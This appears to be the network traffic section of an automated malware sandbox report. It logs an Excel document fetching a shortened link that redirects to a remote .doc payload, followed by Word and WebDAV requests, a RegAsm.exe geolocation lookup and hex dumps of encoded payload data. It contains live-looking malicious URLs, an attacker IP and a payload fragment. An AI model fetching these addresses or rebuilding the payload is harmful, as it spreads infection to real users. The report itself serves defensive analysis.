                                                                                                                                                                    Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                                                                                                                                    Oct 7, 2024 14:53:14.130865097 CEST896INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                                                                                                                                    Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                                                                                                                                    Oct 7, 2024 14:53:14.324438095 CEST1236INData Raw: 59 44 49 32 77 68 4e 59 59 44 46 32 41 68 4e 4d 59 44 41 31 77 66 4e 34 58 44 39 31 41 66 4e 73 58 44 36 31 51 65 4e 67 58 44 33 31 67 64 4e 55 58 44 30 31 77 63 4e 49 58 44 78 31 41 63 4e 38 57 44 75 31 51 62 4e 77 57 44 72 31 67 61 4e 6b 57 44
                                                                                                                                                                    Data Ascii: YDI2whNYYDF2AhNMYDA1wfN4XD91AfNsXD61QeNgXD31gdNUXD01wcNIXDx1AcN8WDu1QbNwWDr1gaNkWDo1wZNYWDl1AZNMWDi1QYNAWDf1gXN0VDc1wWNoVDZ1AWNcVDW1QVNQVDT1gUNEVDQ1wTN4UDN1ATNsUDK1QSNgUDH1gRNUUDE1wQNIUDAAAQAsBQBQCQMsHj4xgdMOHDxxobMwGjpxwZMSGDix4XM0FjaxAWMWFDT
                                                                                                                                                                    Oct 7, 2024 14:53:14.324484110 CEST1236INData Raw: 41 65 4e 4f 58 44 76 31 6f 61 4e 59 57 44 56 31 41 45 4e 77 54 54 36 30 34 4b 4e 59 53 6a 5a 30 6f 46 4e 72 51 6a 48 7a 41 2b 4d 2f 4f 54 74 7a 49 36 4d 34 4e 7a 62 7a 67 32 4d 6d 4d 7a 48 79 55 75 4d 50 4c 44 75 79 45 72 4d 49 4b 44 67 79 4d 6d
                                                                                                                                                                    Data Ascii: AeNOXDv1oaNYWDV1AENwTT604KNYSjZ0oFNrQjHzA+M/OTtzI6M4Nzbzg2MmMzHyUuMPLDuyErMIKDgyMmMVJjRyYQMsDAAAgHAFAAAAAwPU/jp/k3Pn9zT/YkPJ7jA9sePe3T09QcPD2jd98WPo1TY8QOPZzzu8QJPyxzR8MxOvvD47Y9OPrj864JO4jjk3Q9NGfzs3s6NdejV3k0N1czI2srNZVDo1gZNKWTe1wWNhVTI1wAN
                                                                                                                                                                    Oct 7, 2024 14:53:14.324501038 CEST448INData Raw: 53 44 6a 30 73 48 4e 78 52 7a 5a 30 41 47 4e 52 52 7a 53 30 51 45 4e 35 49 54 76 79 49 72 4d 53 46 6a 2b 78 51 66 4d 75 48 7a 32 78 30 63 4d 46 48 6a 72 78 51 61 4d 5a 47 7a 6b 78 34 59 4d 70 46 44 59 78 77 54 4d 30 41 54 39 77 30 4f 4d 73 43 54
                                                                                                                                                                    Data Ascii: SDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm/44P89Dd/g2Pg9zV/40PG9jP/YzPu8TI/UxPN4zz+MqP35DU+okPE5jP+YjPy4zJ+ghPM0z+98ePd3Tu9oaPc2je9UXPw1DX9EVP80zL9QCP1zz18INPNzjw
                                                                                                                                                                    Oct 7, 2024 14:53:14.324517012 CEST1236INData Raw: 65 44 5a 33 41 30 4e 37 63 6a 4e 33 73 79 4e 4f 59 6a 36 32 59 72 4e 56 61 54 66 32 67 6e 4e 7a 5a 44 61 32 59 6c 4e 30 59 6a 4a 32 6f 68 4e 4c 55 6a 38 31 73 63 4e 44 58 44 72 31 77 5a 4e 67 56 44 57 31 73 54 4e 32 55 54 4d 30 77 4e 4e 58 54 54
                                                                                                                                                                    Data Ascii: eDZ3A0N7cjN3syNOYj62YrNVaTf2gnNzZDa2YlN0YjJ2ohNLUj81scNDXDr1wZNgVDW1sTN2UTM0wNNXTTx04LN4STs0cINtRTW0EFNFRDK04xM7PT8zw9MLPTqz85MSOTiz82MeNTKzAyMPMzAyguMXLjoyspMuJzZx4aMyEjHwICAAEAkAQAgAAAA/c9Pn+jd/YSPzxzS4kIOlUj+0MLNvSzq0cKNjSzn0sJNXKT4yQoMVFj6
                                                                                                                                                                    Oct 7, 2024 14:53:14.324532986 CEST1236INData Raw: 67 61 4f 70 6c 6a 42 34 51 4c 4f 77 69 44 72 34 67 4b 4f 6b 69 44 6f 34 77 4a 4f 59 69 44 6c 34 41 4a 4f 4d 69 44 69 34 77 57 4e 78 4f 44 56 41 41 41 41 77 41 77 41 67 44 41 41 41 59 44 6a 32 67 6f 4e 45 61 44 67 32 77 6e 4e 34 5a 44 64 32 41 58
                                                                                                                                                                    Data Ascii: gaOpljB4QLOwiDr4gKOkiDo4wJOYiDl4AJOMiDi4wWNxODVAAAAwAwAgDAAAYDj2goNEaDg2wnN4ZDd2AXNkXDb1gWNkVDY1wVNYVDV1AFNETDT0gENERDQ0wDN4QDN0AzMnODMzwyMoMDJzAyMcMDGzQhM/JDCyQgMAED/xgfM0HD8xweMjBAAAQGADANAAAwPP/Tv/s5PJ+Ta/QlP30je2gcNMND0zYiMVLDzygrMcJTUyMkM
                                                                                                                                                                    Oct 7, 2024 14:53:14.324547052 CEST1236INData Raw: 2f 6a 31 2f 41 39 50 4b 2f 44 78 2f 38 37 50 35 2b 7a 73 2f 30 36 50 6f 2b 6a 6f 2f 77 35 50 57 2b 54 6b 2f 73 34 50 46 2b 7a 66 2f 6f 33 50 30 39 6a 62 2f 67 32 50 6a 39 54 58 2f 63 31 50 52 39 44 54 2f 59 30 50 41 39 6a 4f 2f 55 7a 50 76 38 54
                                                                                                                                                                    Data Ascii: /j1/A9PK/Dx/87P5+zs/06Po+jo/w5PW+Tk/s4PF+zf/o3P09jb/g2Pj9TX/c1PR9DT/Y0PA9jO/UzPv8TK/MyPe8DG/IxPM8zB/EgP67z8+0uPI2To9UBPRzDx80LP3yTs8AKPDyjb8gGPgxzS84DPywDJ78fONmjh5oXOihj644NO5gzM3o9NPfTg3I3NsdDZ3ggNgbzW24iNpYDF18fNjXTz1UcN8Wzq1wANtTD20sMN7Sjp


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.2249179178.237.33.50801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Oct 7, 2024 14:53:18.167373896 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                    Host: geoplugin.net
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Oct 7, 2024 14:53:18.773524046 CEST1170INHTTP/1.1 200 OK
                                                                                                                                                                    date: Mon, 07 Oct 2024 12:53:18 GMT
                                                                                                                                                                    server: Apache
                                                                                                                                                                    content-length: 962
                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                    cache-control: public, max-age=300
                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                                                                    Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.224916314.194.50.2114433320C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-10-07 12:52:45 UTC317OUTGET /d1a1 HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                    Host: m2g.me
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-10-07 12:52:45 UTC407INHTTP/1.1 302 Found
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:52:45 GMT
                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                    Location: http://38.240.44.9/450/hun/nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____veryniceenitertime.doc
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.224916514.194.50.2114433616C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-10-07 12:52:48 UTC128OUTOPTIONS / HTTP/1.1
                                                                                                                                                                    User-Agent: Microsoft Office Protocol Discovery
                                                                                                                                                                    Host: m2g.me
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-10-07 12:52:49 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:52:49 GMT
                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    2024-10-07 12:52:49 UTC7968INData Raw: 33 37 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 34 32 29 23 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 20 73 69 7a 65 73 20 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 20 68 69 73 74 6f 72 79 20 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 20 70 6f 73 74 6d 65 73 73 61 67 65 20 77 65 62 67 6c 20 77 65 62 73 6f 63 6b 65 74 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 77 69 64 74 68 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 73 70 61 6e 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 66 69 6c 6c 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 61 70 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 72 75 6c 65 20
                                                                                                                                                                    Data Ascii: 3750<!DOCTYPE html>... saved from url=(0042)# --><html lang="en" class=" sizes customelements history pointerevents postmessage webgl websockets cssanimations csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule
                                                                                                                                                                    2024-10-07 12:52:49 UTC6198INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 74 69 74 6c 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 33 38 2c 38 32 31 20 20 20 20 3c 2f 73 70 61 6e 3e 2b 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 68 6f 72 74 65 6e 65 64 20 6c 69 6e 6b 73 20 69 6e 20 74 6f 74 61 6c 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                    Data Ascii: <div class="counter-item"> <h2 class="counter-title"><span class="counter"> 38,821 </span>+</h2> <p>Shortened links in total</p>
                                                                                                                                                                    2024-10-07 12:52:49 UTC2INData Raw: 0d 0a
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    2024-10-07 12:52:49 UTC664INData Raw: 32 38 63 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6d 6f 64 65 72 6e 69 7a 72 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 70 6c 75 67 69 6e 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 77 6f 77 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74
                                                                                                                                                                    Data Ascii: 28c<script src="assets/js/jquery-3.3.1.min.js"></script><script src="assets/js/modernizr-3.6.0.min.js"></script><script src="assets/js/plugins.js"></script><script src="assets/js/bootstrap.min.js"></script><script src="assets/js/wow.min.js"></script


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.224916614.194.50.2114433616C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-10-07 12:52:51 UTC111OUTHEAD /d1a1 HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                    Host: m2g.me
                                                                                                                                                                    2024-10-07 12:52:51 UTC388INHTTP/1.1 302 Found
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:52:51 GMT
                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                    Location: http://38.240.44.9/450/hun/nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____veryniceenitertime.doc
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                    3192.168.2.224916714.194.50.211443
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-10-07 12:52:56 UTC123OUTOPTIONS / HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                                                                                    translate: f
                                                                                                                                                                    Host: m2g.me
                                                                                                                                                                    2024-10-07 12:52:56 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:52:56 GMT
                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    2024-10-07 12:52:56 UTC7968INData Raw: 33 37 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 34 32 29 23 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 20 73 69 7a 65 73 20 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 20 68 69 73 74 6f 72 79 20 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 20 70 6f 73 74 6d 65 73 73 61 67 65 20 77 65 62 67 6c 20 77 65 62 73 6f 63 6b 65 74 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 77 69 64 74 68 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 73 70 61 6e 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 66 69 6c 6c 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 61 70 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 72 75 6c 65 20
                                                                                                                                                                    Data Ascii: 3750<!DOCTYPE html>... saved from url=(0042)# --><html lang="en" class=" sizes customelements history pointerevents postmessage webgl websockets cssanimations csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                    4192.168.2.224916814.194.50.211443
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-10-07 12:52:58 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6d 32 67 2e 6d 65 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: m2g.me
                                                                                                                                                                    2024-10-07 12:52:58 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:52:58 GMT
                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    2024-10-07 12:52:58 UTC7968INData Raw: 33 37 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 34 32 29 23 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 20 73 69 7a 65 73 20 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 20 68 69 73 74 6f 72 79 20 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 20 70 6f 73 74 6d 65 73 73 61 67 65 20 77 65 62 67 6c 20 77 65 62 73 6f 63 6b 65 74 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 77 69 64 74 68 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 73 70 61 6e 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 66 69 6c 6c 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 61 70 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 72 75 6c 65 20
                                                                                                                                                                    Data Ascii: 3750<!DOCTYPE html>... saved from url=(0042)# --><html lang="en" class=" sizes customelements history pointerevents postmessage webgl websockets cssanimations csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule
                                                                                                                                                                    2024-10-07 12:52:58 UTC6198INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 74 69 74 6c 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 33 38 2c 38 32 32 20 20 20 20 3c 2f 73 70 61 6e 3e 2b 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 68 6f 72 74 65 6e 65 64 20 6c 69 6e 6b 73 20 69 6e 20 74 6f 74 61 6c 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                    Data Ascii: <div class="counter-item"> <h2 class="counter-title"><span class="counter"> 38,822 </span>+</h2> <p>Shortened links in total</p>
                                                                                                                                                                    2024-10-07 12:52:58 UTC2INData Raw: 0d 0a
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    2024-10-07 12:52:58 UTC664INData Raw: 32 38 63 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6d 6f 64 65 72 6e 69 7a 72 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 70 6c 75 67 69 6e 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 77 6f 77 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74
                                                                                                                                                                    Data Ascii: 28c<script src="assets/js/jquery-3.3.1.min.js"></script><script src="assets/js/modernizr-3.6.0.min.js"></script><script src="assets/js/plugins.js"></script><script src="assets/js/bootstrap.min.js"></script><script src="assets/js/wow.min.js"></script


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                    5192.168.2.224916914.194.50.211443
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-10-07 12:52:59 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6d 32 67 2e 6d 65 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: m2g.me
                                                                                                                                                                    2024-10-07 12:53:00 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:53:00 GMT
                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
